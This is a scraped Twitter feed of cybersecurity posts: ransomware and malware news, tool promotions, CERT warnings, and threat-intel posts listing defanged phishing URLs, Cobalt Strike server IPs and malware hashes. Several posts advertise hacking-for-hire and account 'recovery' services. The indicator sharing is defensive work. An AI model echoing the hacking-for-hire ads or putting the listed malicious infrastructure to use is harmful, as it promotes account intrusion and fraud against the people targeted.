NCITechnologies: #Cybercrime is no laughing matter, but these funny cartoons help drive home the importance of robust #CyberSecurity… https://t.co/Skn0dC5RU9 -- NCITechnologies
NetworkCritical: 🛡️INVIKTUS is the layer of security that protects your network from #cybercrime. It supports full line-rate traffic… https://t.co/qPDPiP2VDn -- NetworkCritical
Onepassen: RT @SecurityTrybe: Cybersecurity Attack Vectors #infosecurity #cyberattacks #cyber #Hacked #Hacking #cybercrime https://t.co/WNSxCOlHT3 -- Onepassen
sectest9: RT @NCITechnologies: #Cybercrime is no laughing matter, but these funny cartoons help drive home the importance of robust #CyberSecurity an… -- sectest9
sectest9: RT @Ccwhiteangel: Love my squad We did great things together miss u guys I'll come back soon promise 🙏 💖 The arrest came after the joint o… -- sectest9
sectest9: RT @thebinarybot: Want quality and quantity at the same time? Okay, let's do it. Here's 50 YouTube channels that you can subscribe to upsk… -- sectest9
securitymag: A 2022 study reveals the most common #password globally was 'password', which was cracked within less than a second… https://t.co/GdJI73z58M -- securitymag
SyedaSamina774: RT @Bizgrowholdings: How ISMS is different from IT? Get in Touch: 🌐: https://t.co/p9V4X0MnNs ✉️: info@bizgrow-holding.co.uk ☎️: 020 8090 4… -- SyedaSamina774
ArgyleCon: Recon-ng is an #OSINT reconnaissance framework in #Python, primarily used for gathering information about a target… https://t.co/k8dxYgzpWV -- ArgyleCon
arismendy7: RT @DailyOsint: If you need a fast and effective port scanner, You can try #RustScan, which is able to scan all ports in 3 seconds. https… -- arismendy7
AtomSpam: Detected #phishing clone at address: hxxp://www[.]mobilformonaydenzzi[.]top/ #denizbank #infosec #cybersecurity… https://t.co/cJFQzmg6Ie -- AtomSpam
C_3PJoe: This week's #OSINT stream (all at 1800 ET) topics: All live at https://t.co/EnMXmS3V6H Recordings available at… https://t.co/VOe1wnXeLV -- C_3PJoe
cobolmf: How does #CyberResGalaxy work? Galaxy looks at threats in terms of impact threat level and annualized loss expectan… https://t.co/QLfbltC0nC -- cobolmf
Commvault: Catch our CEO - @mirchi111 and #India AVP – Balaji Rao in conversation with @ET_CISO discussing everything… https://t.co/bg6mgrrwgw -- Commvault
crispSV: #RuAF IL-96-300PU RA-96025 airborn command post providing intel as #Russia celebrates battle of #Stalingrad… https://t.co/jEYizsSuPJ -- crispSV
CyberSecurityN8: RT @Sn1perSecurity: https://t.co/lS0OSgAp4A With over 5,900 Github favorites, see why Sn1per is quickly becoming the tool of choice for eth… -- CyberSecurityN8
CyberSecurityN8: RT @poulsen_hack58: l'm always available 24/7 #hacked #icloud #imessage #facebookdown #ransomware #snapchat #discord #havking #xboxshare #r… -- CyberSecurityN8
ecarlesi: Possible threat on hxxps://axilinv[.]com/axilmining[.]zip #phishing #opendir #nc -- ecarlesi
ExpresionMX: RT @three_cube: Open Source Intelligence (OSINT): Finding Email Passwords in Dumps with h8mail #osint #h8mail #infosec #cybersecurity #cybe… -- ExpresionMX
eyalbd1: RT @IRONSCALES: 📌 Learn from industry experts on how to tackle #phishing head-on. Don't miss our SVP of Product Management, @davidhabusha,… -- eyalbd1
intelDose: Thales secures contract for GM200 radars for Ukraine ⚠️ #intelligence #geopolitics #osint https://t.co/34UcmWZO2x -- intelDose
l1chn4k: RT @DailyOsint: If you need a fast and effective port scanner, You can try #RustScan, which is able to scan all ports in 3 seconds. https… -- l1chn4k
Matteraz: RT @DailyOsint: If you need a fast and effective port scanner, You can try #RustScan, which is able to scan all ports in 3 seconds. https… -- Matteraz
MikeGrayForever: Why doesn't Phish just open up Phish-themed restaurants? Build like 3 in the NE and you're good. Just endless Phish… https://t.co/KQzriOCIXB -- MikeGrayForever
NCSVenturesCorp: Ransomware attack on data firm ION could take days to fix -sources | #hacking | #cybersecurity | #infosec |… https://t.co/VdhqsNvAHg -- NCSVenturesCorp
Nishant15369669: Does anyone have Cloufront WAF Bypass for XSS ?📜 Believe me, it’s impossible to break cloudfront, cloudflare is no… https://t.co/ECQopRBUM4 -- Nishant15369669
ODOSHOMAMO: RT @erickie007: Great #API fuzzing article by @3nc0d3dGuY #infosec #cybersecurity #BugBounty #bugbountytips https://t.co/d6fRashXW8 -- ODOSHOMAMO
poulsen_hack58: Have exclusive Hacking jobs? and Ask for my service. #hacked #icloud #facebookdown #imessage #ransomware #snapchat… https://t.co/FB9RTR4N4b -- poulsen_hack58
poulsen_hack58: Offering the best recovery services. And media accounts hacking, Infiltration, and recovery. #hackedinstagram… https://t.co/uoggb9qvz6 -- poulsen_hack58
poulsen_hack58: If you need help to recover any account, Tiktok, Snapchat, Instagram etc. I'm available 24/7 Send me an inbox… https://t.co/iKCnELN9oO -- poulsen_hack58
poulsen_hack58: l'm always available 24/7 #hacked #icloud #imessage #facebookdown #ransomware #snapchat #discord #havking… https://t.co/s1hiQs21Sh -- poulsen_hack58
ReneRobichaud: LockBit ransomware goes 'Green,' uses new Conti-based encryptor https://t.co/wSDm0DY2uN #Infosec #Secinfo… https://t.co/E4gtNMW3mG -- ReneRobichaud
ReneRobichaud: APT groups use ransomware TTPs as cover for intelligence gathering and sabotage https://t.co/vVd6R7SYyk #Infosec… https://t.co/bO7Kw8YkkL -- ReneRobichaud
Scieducation1: RT @TrendMicroRSRCH: [6/6] Organizations should note that the Magniber #ransomware ensures that shadow copies are deleted to inhibit system… -- Scieducation1
sectest9: RT @Sn1perSecurity: https://t.co/lS0OSgAp4A With over 5,900 Github favorites, see why Sn1per is quickly becoming the tool of choice for eth… -- sectest9
ShishuangLi: RT @Sn1perSecurity: https://t.co/lS0OSgAp4A With over 5,900 Github favorites, see why Sn1per is quickly becoming the tool of choice for eth… -- ShishuangLi
Sn1perSecurity: https://t.co/lS0OSgAp4A With over 5,900 Github favorites, see why Sn1per is quickly becoming the tool of choice for… https://t.co/M7TpPSe0Ab -- Sn1perSecurity
teamcymru: Are you defeating cyber-attacks even before they start? Learn how the threat maturity model using threat reconnaiss… https://t.co/R5dnsZ2f75 -- teamcymru
terranova_isa: The results from our biggest Gone Phishing Tournament are here! It’s time to reveal how participating end users did… https://t.co/EKNlLmqhKN -- terranova_isa
TheAmoghavarsha: RT @AllForOsint: Hey #OSINT, Feedly (https://t.co/HEsDAPc8hF) is a news aggregator application, compiles news feeds from a variety of onlin… -- TheAmoghavarsha
VeronikaNikiNik: RT @three_cube: Tracking the Target Through Cyberspace! OSINT: Finding the Same Username across Multiple Platforms #osint #osint4hackers #… -- VeronikaNikiNik
akkoh1: Phishing scams will keep phishing. Report and unsubscribe from the list if you have received this kind of emails.… https://t.co/kvINcmvnW9 -- akkoh1
AtomSpam: Detected #phishing clone at address: hxxp://www[.]u1924695[.]cp[.]regruhosting[.]ru/ #BancoColombia #bank #infosec… https://t.co/ZbavlZ20IO -- AtomSpam
CyberSecurityN8: RT @iSecurity: Cybercrime is world’s third-largest economy thanks to booming black market https://t.co/pmrZeSJ7P7 #malware #cybersecurity #… -- CyberSecurityN8
CyberSecurityN8: RT @PenTestMag: Mobile Ethical Hacking (W46) #pentest #pentestmag #pentestblog #cybersecurity #infosecurity #opensource #malware #pentesti… -- CyberSecurityN8
FSISAC: In our latest FinCyber Today podcast episode, Elizabeth Heathfield is talking to Jenny Menna, VP and Threat Management and Response at @Humana. Learn about the active threats to the insurance and healthcare sectors and much more: https://t.co/qfso -- FSISAC
GSarafan: Next week I'm going to be on the We Are Everywhere Podcast! #Phish @WAE_podcast -- GSarafan
iBoostUp: iBoostUp Spyware Doctor cloud detected macOS #malware Adware.Pirrit in LaCiotat, France. #Infection was in a file… https://t.co/c4Np5rq1mj -- iBoostUp
iSecurity: Cybercrime is world’s third-largest economy thanks to booming black market https://t.co/pmrZeSJ7P7 #malware #cybersecurity #datasecurity -- iSecurity
overphlowtank: Absolute AI nightmare fuel #phish https://t.co/aoXEkY0woA -- overphlowtank
PenTestMag: Mobile Ethical Hacking (W46) #pentest #pentestmag #pentestblog #cybersecurity #infosecurity #opensource #malware… https://t.co/bG7AQoqXKN -- PenTestMag
PhishRT: RT @GSarafan: Next week I'm going to be on the We Are Everywhere Podcast! #Phish @WAE_podcast -- PhishRT
ReneRobichaud: Hackers use new IceBreaker malware to breach gaming companies https://t.co/Y9x8zv2kNk #Infosec #Secinfo #Security… https://t.co/hGg3LRYFOy -- ReneRobichaud
ReneRobichaud: New Prilex Malware Blocks Contactless Payments to Steal Credit Card Data https://t.co/UYMy4xjxVb #Infosec #Secinfo… https://t.co/mkmkS612nb -- ReneRobichaud
ReneRobichaud: New HeadCrab malware infects 1,200 Redis servers to mine Monero https://t.co/Bcqau8arr6 #Infosec #Secinfo… https://t.co/pCQGNvKtlu -- ReneRobichaud
sectest9: RT @PenTestMag: Mobile Ethical Hacking (W46) #pentest #pentestmag #pentestblog #cybersecurity #infosecurity #opensource #malware #pentesti… -- sectest9
SocEngineerInc: Hackers Abused Microsoft's "Verified Publisher" OAuth Apps to Breach Corporate Email Accounts… https://t.co/IaKjsREHR8 -- SocEngineerInc
VivMilanoFSL: RT @iSecurity: Cybercrime is world’s third-largest economy thanks to booming black market https://t.co/pmrZeSJ7P7 #malware #cybersecurity #… -- VivMilanoFSL
CSIRTCV: ⚠️ El proveedor de red celular de #Google, #GoogleFi confirmó una violación de datos probablemente relacionada con el reciente incidente de seguridad en #T-Mobile, que permitió a los #ciberdelincuentes robar la información de millones de clientes -- CSIRTCV
BACSIRT: @isydrox ¡Hola @isydrox ! Lamentamos que hayas resultado víctima de esa situación. Queremos contarte que podés escribirnos por MD o a través de nuestro correo 📩 ciberseguridad@ba-csirt.gob.ar, para que te asesoremos sobre este o cualquier otro c -- BACSIRT
CERTAzerbaijan: Hər hansı şirkət və ya qurum adından belə məlumatlar aldıqda öncə həmin müəssisə ilə əlaqə saxlayaraq və yaxud qurumun rəsmi saytına daxil olaraq məlumatın düzgünlüyündən əmin olmaq məsləhət görülür. -- CERTAzerbaijan
CERTAzerbaijan: Elektron Təhlükəsizlik Xidməti vətəndaşlara belə vədlərə etimad etməməyi, şübhəli keçidlərə daxil olmamağı tövsiyə edir. -- CERTAzerbaijan
CERTAzerbaijan: Son günlər “SmartPay” onlayn ödəniş portalı adından "Psmartpay" adlı saxta veb-səhifə yaradılaraq vətəndaşlara bonuslar təklif olunur. Onlardan vəd olunan bonusları əldə etmək üçün təqdim olunan saxta veb-səhifəyə bank və digər fərdi məlum -- CERTAzerbaijan
certlv: ‼️Brīdinājums! Šodien masveidā tiek izsūtīti krāpnieciski e-pasti bankas Citadele vārdā. Starp saņemtajiem paraugiem esam identificējuši arī tādus, kas satur inficētu pielikumu. Tādēļ aicinām iedzīvotājus būt īpaši uzmanīgiem, un pielikumu nekādā -- certlv
CSIRTCV: 🔴 #Vulnerabilidad #ZeroDay en #AWSGlue que permitía a un atacante crear recursos y acceder a la información de otros usuarios del servicio. Más información: https://t.co/WX9sWjFkXk https://t.co/uHwCLkWKTV -- CSIRTCV
_saf_ai_: RT @DataBreachToday: Ransomware hit on Dublin-based ION Group delays EU derivatives trades. Initial reports say Russia-based #LockBit #rans… -- _saf_ai_
Anthony43656765: RT @hackinarticles: Threat Intelligence #infosec #cybersecurity #cybersecuritytips #pentesting #oscp #redteam #informationsecurity #cissp… -- Anthony43656765
Anthony43656765: RT @hackinarticles: Information Security Concept #infosec #cybersecurity #cybersecuritytips #pentesting #oscp #redteam #informationsecurit… -- Anthony43656765
CyberSecurityN8: RT @ecarlesi: Possible threat on hxxp://malaysianskinfoundation[.]org/wordpress-6[.]0[.]zip #phishing #opendir https://t.co/GWdh0DmP7V -- CyberSecurityN8
CyberSecurityN8: RT @SecurityTrybe: List of Bug Bounty/Crowdsourced Security Platforms #bugbountytips #bugbounty #tech #Hacked #infosecurity #security #cy… -- CyberSecurityN8
CyberSecurityN8: RT @tonymorbin: Pyongyang Stole $1.7B in Crypto https://t.co/dcCLkP4lqf Close to half of the world's cryptocurrency stolen in 2022 - mainly… -- CyberSecurityN8
ecarlesi: Possible threat on hxxp://malaysianskinfoundation[.]org/wordpress-6[.]0[.]zip #phishing #opendir https://t.co/GWdh0DmP7V -- ecarlesi
ecarlesi: Possible threat on hxxp://tarrahwp[.]com/wordpress-6[.]1[.]1[.]zip #phishing #opendir -- ecarlesi
Farm_Machinery_: RT @psybersafe: And now they're hacking our beer! The stakes are getting higher... #cybercrime #cybersecuritynews #Hacking #infosec #beer… -- Farm_Machinery_
foscraft: RT @erickie007: Great #API fuzzing article by @3nc0d3dGuY #infosec #cybersecurity #BugBounty #bugbountytips https://t.co/d6fRashXW8 -- foscraft
gdprAI: RT @MERconference: Join hundreds of executives, experts, and innovators helping to shape the future of INFORMATION GOVERNANCE AS A BUSINESS… -- gdprAI
Hashirama_121: RT @ITSecurityguard: This is your yearly reminder that ALL Udemy Bug Bounty courses are a waste of money. The content you need is out the… -- Hashirama_121
KingDanjay: Inbox now for all account recovery services,Lost or suspended, Inbox now let's get it done. #hacked #icloud… https://t.co/rw6BKpfBmm -- KingDanjay
KingDanjay: Have a lost account you want to recover but don't know how? Inbox now for guide on how to recover your account imme… https://t.co/EbiBavuz3D -- KingDanjay
KingDanjay: I'm available 24/7 Inbox me #hacked #facebookdown #whatsapp #hackedinstagram #twitterdown #lockedaccount #metamask… https://t.co/BJhq8Nmqov -- KingDanjay
KingDanjay: Inbox Us, if you need our Hacking Services. We are Available 24/7 Inbox and Smile Again #Hacked #facebookdown… https://t.co/S1PTfijtzR -- KingDanjay
KingDanjay: Hacking attempts on your device? Dm now for risk free security solutions. #hacked #icloud #facebookdown #imessage… https://t.co/K3PuXBjc8X -- KingDanjay
NaOm157: RT @SecurityTrybe: List of Bug Bounty/Crowdsourced Security Platforms #bugbountytips #bugbounty #tech #Hacked #infosecurity #security #cy… -- NaOm157
psybersafe: And now they're hacking our beer! The stakes are getting higher... #cybercrime #cybersecuritynews #Hacking… https://t.co/hTiIeLwVQr -- psybersafe
RobbyCataldo: The #cybercrime job market is bustling. @Kaspersky found that some hacking groups are offering developers upwards o… https://t.co/LPWmLMqlpQ -- RobbyCataldo
SEACOM: South Africa remains the most targeted African country in terms of ransomware and business email compromise. Learn… https://t.co/92eu0tV5LL -- SEACOM
sectest9: RT @KingDanjay: Inbox now for all account recovery services,Lost or suspended, Inbox now let's get it done. #hacked #icloud #facebookdown #… -- sectest9
sectest9: RT @hackinarticles: Threat Intelligence #infosec #cybersecurity #cybersecuritytips #pentesting #oscp #redteam #informationsecurity #cissp… -- sectest9
sectest9: RT @psybersafe: And now they're hacking our beer! The stakes are getting higher... #cybercrime #cybersecuritynews #Hacking #infosec #beer… -- sectest9
sectest9: RT @SecurityTrybe: List of Bug Bounty/Crowdsourced Security Platforms #bugbountytips #bugbounty #tech #Hacked #infosecurity #security #cy… -- sectest9
threatshub: ThreatsHub Cybersecurity News | 6 Ransomware Trends &amp; Evolutions For 2023 - https://t.co/g8OeXGYXDE #CyberSecurity… https://t.co/SUdpNBoRfY -- threatshub
threatshub: ThreatsHub Cybersecurity News | Enterprises turn to single-vendor SASE for ease of manageability -… https://t.co/kJtKd5kBV1 -- threatshub
tonymorbin: Pyongyang Stole $1.7B in Crypto https://t.co/dcCLkP4lqf Close to half of the world's cryptocurrency stolen in 2022… https://t.co/dTfEwjDQnt -- tonymorbin
ViewPointCRM: Microsoft's security team says it's tracking over 100 #ransomware actors https://t.co/FigKmevcoJ @TechRadarPro https://t.co/1v1hmHSYph -- ViewPointCRM
virajapro: RT @SecurityTrybe: List of Bug Bounty/Crowdsourced Security Platforms #bugbountytips #bugbounty #tech #Hacked #infosecurity #security #cy… -- virajapro
xaeroborg: RT @RootxRavi: Just scored a 4 Digit Bounty on @YogoshaOfficial 1 : Get all the URL from wayback / Gau 2 : Filter out the js file using… -- xaeroborg
Anthony43656765: RT @cybsecbot: In the past 24 hours, 846 IoC's were submitted and #QakBot is the most seen #malware family on abuse[.]ch -- Anthony43656765
Anthony43656765: RT @DailyOsint: If you need a fast and effective port scanner, You can try #RustScan, which is able to scan all ports in 3 seconds. https… -- Anthony43656765
Anthony43656765: RT @three_cube: Open Source Intelligence (OSINT): Finding Email Passwords in Dumps with h8mail #osint #h8mail #infosec #cybersecurity #cybe… -- Anthony43656765
beefyspace: RT @noladefense: #phishing Website Detected #infosec #cybersecurity #scam #フィッシング詐欺 #偽サイト URL: hxxp://www[.]ama45425f[.]xyz/jp IP: 155.94.… -- beefyspace
CyberSecurityN8: RT @ecarlesi: Threat on hxxps://5758999[.]com/app[.]html?shareName=438671[.]com #malware -- CyberSecurityN8
CyberSecurityN8: RT @GDPR123: City of London on High Alert After Ransomware Attack https://t.co/H3gvaghKsr #UK #CityOfLondon #London #RansomwareAttack #Cybe… -- CyberSecurityN8
CyberSecurityN8: RT @threatshub: ThreatsHub Cybersecurity News | 6 Ransomware Trends &amp; Evolutions For 2023 - https://t.co/g8OeXGYXDE #CyberSecurity #Coudse… -- CyberSecurityN8
ecarlesi: Threat on hxxp://pharma-ms[.]com/pharma[.]zip #phishing #fastdomain -- ecarlesi
ecarlesi: Threat on hxxps://5758999[.]com/app[.]html?shareName=438671[.]com #malware -- ecarlesi
ecarlesi: Threat on hxxp://lloyds-online4[.]com/Login[.]php #phishing #lloyds https://t.co/Q0GeZfKsn3 -- ecarlesi
ecarlesi: Possible threat on hxxp://lockdaccesactolapla[.]com #phishing #Register_com -- ecarlesi
ecarlesi: Possible threat on hxxp://googleabb[.]com #phishing -- ecarlesi
fe_tsoc: RT @noladefense: #phishing Website Detected #infosec #cybersecurity #scam #フィッシング詐欺 #偽サイト URL: hxxp://www[.]ama45425f[.]xyz/jp IP: 155.94.… -- fe_tsoc
g00dictator: RT @three_cube: Open Source Intelligence (OSINT): Finding Email Passwords in Dumps with h8mail #osint #h8mail #infosec #cybersecurity #cybe… -- g00dictator
IpshitaG123: RT @ImmuneBytes: Co-founder of @moonbirds creator @proof_xyz, @kevinrose, lost #NFTs worth $1M in what appears to be a #phishing #attack.… -- IpshitaG123
Mailfence: It only takes one email to compromise your #data… Don’t fall for a #phishing attack. Learn how to spot it and what… https://t.co/QR5Ai43SxV -- Mailfence
maldatabase: #Dridex malware indicators. #Malware #ThreatIntelligence #threatintel #IOC https://t.co/mZ43bVjYdI -- maldatabase
noladefense: #phishing Website Detected #infosec #cybersecurity #scam #フィッシング詐欺 #偽サイト URL: hxxps://login[.]sonymuslc[.]net/?aut… https://t.co/9WvAd5MRVv -- noladefense
noladefense: #phishing Website Detected #infosec #cybersecurity #scam #フィッシング詐欺 #偽サイト URL: hxxps://www-manager-account-amazone[… https://t.co/7xmg0FUWNp -- noladefense
RedPacketSec: Malware Analysis - amadey - fd178725fc7ebd4257d17a823158bec5 - https://t.co/MJUypEWTPl #Malware #OSINT #ThreatIntel #amadey -- RedPacketSec
RedPacketSec: Malware Analysis - smokeloader - c9afe5085553d1b7b388cc818b7b5a09 - https://t.co/ovWq4mbFOL #Malware #OSINT #ThreatIntel #smokeloader -- RedPacketSec
RedPacketSec: Cobalt Stike Beacon Detected - 18[.]212[.]19[.]9:443 - https://t.co/zoBdMAeTKL #CobaltStrikeBeaconDetected #OSINT #ThreatIntel -- RedPacketSec
RedPacketSec: Malware Analysis - amadey - b0d836844b04e4a6f4b5ca87cb6ce63e - https://t.co/lutkNOAmji #Malware #OSINT #ThreatIntel #amadey -- RedPacketSec
RedPacketSec: Cobalt Stike Beacon Detected - 209[.]141[.]52[.]22:443 - https://t.co/PyQb1W8bff #CobaltStrikeBeaconDetected #OSINT #ThreatIntel -- RedPacketSec
RedPacketSec: Cobalt Stike Beacon Detected - 146[.]70[.]87[.]143:80 - https://t.co/B1LhBu8sde #CobaltStrikeBeaconDetected #OSINT #ThreatIntel -- RedPacketSec
RedPacketSec: Cobalt Stike Beacon Detected - 123[.]60[.]165[.]221:443 - https://t.co/gBFy4YRjyC #CobaltStrikeBeaconDetected #OSINT #ThreatIntel -- RedPacketSec
RedPacketSec: Cobalt Stike Beacon Detected - 109[.]172[.]45[.]28:80 - https://t.co/jnAYGIULOa #CobaltStrikeBeaconDetected #OSINT #ThreatIntel -- RedPacketSec
RedPacketSec: Cobalt Stike Beacon Detected - 162[.]33[.]179[.]221:443 - https://t.co/mV46ADlcEe #CobaltStrikeBeaconDetected #OSINT #ThreatIntel -- RedPacketSec
RedPacketSec: Cobalt Stike Beacon Detected - 101[.]35[.]247[.]212:443 - https://t.co/jtABj7yOCk #CobaltStrikeBeaconDetected #OSINT #ThreatIntel -- RedPacketSec
RedPacketSec: Cobalt Stike Beacon Detected - 109[.]192[.]212[.]70:9001 - https://t.co/GCjqEFJso7 #CobaltStrikeBeaconDetected #OSINT #ThreatIntel -- RedPacketSec
RockRajesh12493: RT @k7computing: This blog discusses the subtleties of Phobos ransomware, which encrypts user files using the DLL side loading approach. Ex… -- RockRajesh12493
sectest9: RT @GDPR123: City of London on High Alert After Ransomware Attack https://t.co/H3gvaghKsr #UK #CityOfLondon #London #RansomwareAttack #Cybe… -- sectest9
BruneiCERT: Senior citizens are vulnerable to cybersecurity threats too! This chart shows the % of senior citizens in Brunei who experienced cybersecurity incidents from 2021-2022. #BruCERT #SecureVerifyConnect #Brunei https://t.co/deHQaaqy3c -- BruneiCERT
csirt_it: Risolta vulnerabilità con gravità “alta” in #Django, noto framework open source per lo sviluppo di applicazioni web Rischio: 🟡 Tipologia: Denial of Service 🔗 https://t.co/6sBR2RQIGI 🔄 Aggiornamenti disponibili 🔄 https://t.co/0shRwNX6XL -- csirt_it
Ananya22a: Use privacy settings! @advisorcyberlaw @cyberwelfares @shakeelcyber #cyberwelfaresociety #cybercrime… https://t.co/uOAk43QXH8 -- Ananya22a
bokaropolice: RT @Cyberdost: Today is the 1st Wednesday of the month and it is Cyber Awareness Day! Do your part to become cyber smart by achieving all o… -- bokaropolice
bugbounty18: Auditing Kubernetes with Open Source SIEM and XDR https://t.co/5zx9qWGGd7 #bugbounty #bugbounties -- bugbounty18
CyberSecurityN8: RT @ExitoEvents: We are excited to announce @GroupIB as a Gold Partner at the 16th Edition of Cyber Security Summit: Kenya supported by @kc… -- CyberSecurityN8
CyberSecurityN8: RT @Joneshacksit: Do you want to build a website with special features that can process everything, find no more. Contact us now. #instate… -- CyberSecurityN8
CyberSecurityN8: RT @namx05: I published an Article of "My first Hall Of Fame with a chained Broken Access Control" https://t.co/O6mgSdiXA0 #infosec #Bu… -- CyberSecurityN8
elhaji_leon: RT @NandanLohitaksh: Bountystrike-sh It installs common bug bounty tools, performs recon scans and continous asset discovery https://t.co… -- elhaji_leon
gdprAI: RT @solidcyberuk: Keeping devices updated regularly reduces your cyber risk https://t.co/oa0fpYy1ix #VulnerabilityAssesment #GDPR #ICO #Da… -- gdprAI
j0k3rVII: RT @hetmehtaa: Scriptkiddi3 - Recon and Initial Vulnerability Detection Tool by @thecyberneh #infosec #cyber #hacking #bugbounty https://… -- j0k3rVII
Joneshacksit: Do you want to build a website with special features that can process everything, find no more. Contact us now.… https://t.co/yudtKzMkoc -- Joneshacksit
kcsfa: RT @ExitoEvents: We are excited to announce @GroupIB as a Gold Partner at the 16th Edition of Cyber Security Summit: Kenya supported by @kc… -- kcsfa
KimutaiWilbert1: RT @hackinarticles: Web Application Pentest Lab Setup AWS https://t.co/M2TMhqyosm Docker https://t.co/PG4tyz7mhL Windows https://t.co/j… -- KimutaiWilbert1
Mambacmd1: RT @SecurityTrybe: YouTube Channels for Hacking and Bug Bounty #Hacked #hack #CyberSec #cyber #infosecurity #bugbounty #Hacking https://t… -- Mambacmd1
mazoone12: RT @ADITYASHENDE17: Its up and going on — https://t.co/U28ahMYFCX Share as much as possible. #BugBounty #bugbountytips -- mazoone12
namx05: I published an Article of "My first Hall Of Fame with a chained Broken Access Control" https://t.co/O6mgSdiXA0 #infosec #BugBounty -- namx05
pejoneresearch: Bitwarden: attacco phishing tramite Google Ads https://t.co/DotDCFkgMh #2febbraio #phishing #CyberAttack #CyberSec… https://t.co/BtOgKvJOTe -- pejoneresearch
sectest9: RT @viehgroup: Bypass Premium Account Payment (GetPocket) https://t.co/VjkYtKBIK5 #infosec #Bugbounty #bugbountytips #cybersecurity #hack… -- sectest9
sectest9: RT @solidcyberuk: Keeping devices updated regularly reduces your cyber risk https://t.co/oa0fpYy1ix #VulnerabilityAssesment #GDPR #ICO #Da… -- sectest9
sectest9: RT @namx05: I published an Article of "My first Hall Of Fame with a chained Broken Access Control" https://t.co/O6mgSdiXA0 #infosec #Bu… -- sectest9
2u4ngnv: RT @Arie_10101: I'm excited to drop new research on #TrickGate Six-year-old Software Service Used to deploy the Most Wanted Malware. TrickG… -- 2u4ngnv
beefyspace: RT @ecarlesi: Threat on hxxps://muslash[.]online/Site[.]zip #phishing #opendir #hostinger -- beefyspace
CinaBerjanggut: RT @e_kaspersky: CONTACTLESS PAYMENT ISN'T WORKING? The new version of #Prilex #malware, used to attack POS terminals, now can block NFC t… -- CinaBerjanggut
CyberSecurityN8: RT @TechNative: Seven steps security awareness professionals can take to ensure vital #leadership support via @SANSInstitute #infosec #cy… -- CyberSecurityN8
CyberSecurityN8: RT @noladefense: #phishing Website Detected #infosec #cybersecurity #scam #フィッシング詐欺 #偽サイト URL: hxxps://fu-ato[.]com/au/ IP: 2a06:98c1:3121… -- CyberSecurityN8
CyberSecurityN8: RT @Swati_THN: 🚨 ALERT: Gaming &amp; gambling industry is under attack! Hackers are using sneaky social engineering tactics ahead of ICE Londo… -- CyberSecurityN8
cybsecbot: RT @CyberIQs_: Prilex malware blocks NFC transactions #infosec #infosecurity #cybersecurity #threatintel #threatintelligence #hacking #cybe… -- cybsecbot
ecarlesi: Threat on hxxps://muslash[.]online/Site[.]zip #phishing #opendir #hostinger -- ecarlesi
ecarlesi: Threat on hxxps://nnndddttt[.]com/ #malware #nc https://t.co/mSb0h3czpx -- ecarlesi
MartinSukal: RT @UKikaski: APU Mi-24 mowing the grass... #OSINT #Ukraine #UkraineWar https://t.co/RDZzGEsSJc -- MartinSukal
mohamed_sallam: #Fortinet Next-Generation Firewalls (#NGFWs) are designed to offload critical security and networking functions to… https://t.co/Gnkx9XP1y5 -- mohamed_sallam
MrMarchi: #Onenote documents spread #Malware in several ... -- Technology | : https://t.co/Dm2grtuAaf. #2022 #2023… https://t.co/wFt19CPKHW -- MrMarchi
MrSkanner: #Onenote documents spread #Malware in several ... -- Technology | : https://t.co/aj3Q3TnnwN. #2022 #2023… https://t.co/trULHj0ppd -- MrSkanner
noladefense: #phishing Website Detected #infosec #cybersecurity #scam #フィッシング詐欺 #偽サイト URL: hxxp://poizedlotuscvboutique[.]com/s… https://t.co/ewn9zwb9F3 -- noladefense
noladefense: #phishing Website Detected #infosec #cybersecurity #scam #フィッシング詐欺 #偽サイト URL: hxxps://fu-ato[.]com/au/ IP: 2a06:98… https://t.co/VogyAjJ1lg -- noladefense
noladefense: #phishing Website Detected #infosec #cybersecurity #scam #フィッシング詐欺 #偽サイト URL: hxxps://xogaz-5iaaa-aaaad-qezrq-cai[… https://t.co/HGLxoF91C8 -- noladefense
northx26: RT @northx26: 🔴 Predatory Recreation #Gay #Muslim #Islamic Ghost &amp; Wolves still active. #Phishing Biometrics Vision Risk ▪️Epidemic… -- northx26
northx26: 🔴 Predatory Recreation #Gay #Muslim #Islamic Ghost &amp; Wolves still active. #Phishing Biometrics Vision Risk… https://t.co/3nohE5ksgg -- northx26
nprime496: RT @DailyOsint: If you need a fast and effective port scanner, You can try #RustScan, which is able to scan all ports in 3 seconds. https… -- nprime496
RedPacketSec: LIVEBOX Collaboration vDesk privilege escalation | CVE-2022-45172 - https://t.co/2VcGHBPggU #CVE #Vulnerability #OSINT #ThreatIntel #Cyber -- RedPacketSec
RedPacketSec: reason-jose security bypass | CVE-2023-23928 - https://t.co/n9XdoiNJ7b #CVE #Vulnerability #OSINT #ThreatIntel #Cyber -- RedPacketSec
RedPacketSec: Dompdf code execution | CVE-2023-23924 - https://t.co/0cz336BEAA #CVE #Vulnerability #OSINT #ThreatIntel #Cyber -- RedPacketSec
RedPacketSec: Serenissima Informatica FastCheckIn directory traversal | CVE-2022-47768 - https://t.co/IfNL8q45Q4 #CVE… https://t.co/4QwhvkH31M -- RedPacketSec
RedPacketSec: Ampache cross-site scripting | CVE-2023-0606 - https://t.co/A614LFlUnb #CVE #Vulnerability #OSINT #ThreatIntel #Cyber -- RedPacketSec
RedPacketSec: Trend Micro Apex One file upload | CVE-2023-0587 - https://t.co/nJuOpyQ4En #CVE #Vulnerability #OSINT #ThreatIntel #Cyber -- RedPacketSec
RedPacketSec: Tenable https://t.co/mgNp8RQtPX, https://t.co/3ifZGM4eWX and Nessus privilege escalation | CVE-2023-0524 -… https://t.co/SeS5PFRqyF -- RedPacketSec
RuOilTracker: 🇷🇺-&gt;🇹🇷 HORIZON ATHENA Departed Novorossiysk with 50,000 tons of oil products for delivery in #Izmit, #Turkey… https://t.co/FMXvkhlfgl -- RuOilTracker
sectest9: RT @Swati_THN: 🚨 ALERT: Gaming &amp; gambling industry is under attack! Hackers are using sneaky social engineering tactics ahead of ICE Londo… -- sectest9
sectest9: RT @CyberIQs_: Prilex malware blocks NFC transactions #infosec #infosecurity #cybersecurity #threatintel #threatintelligence #hacking #cybe… -- sectest9
sectest9: RT @pejoneresearch: Bitwarden: attacco phishing tramite Google Ads https://t.co/DotDCFkgMh #2febbraio #phishing #CyberAttack #CyberSec #cyb… -- sectest9
sectest9: RT @TechNative: Seven steps security awareness professionals can take to ensure vital #leadership support via @SANSInstitute #infosec #cy… -- sectest9
SouthEastCRC: Recently, a solicitors firm received a £98K fine from the Information Commissioner's Officer after a #Ransomware at… https://t.co/c2p7hFGYMb -- SouthEastCRC
TechNative: Seven steps security awareness professionals can take to ensure vital #leadership support via @SANSInstitute… https://t.co/owNpDSlqzc -- TechNative
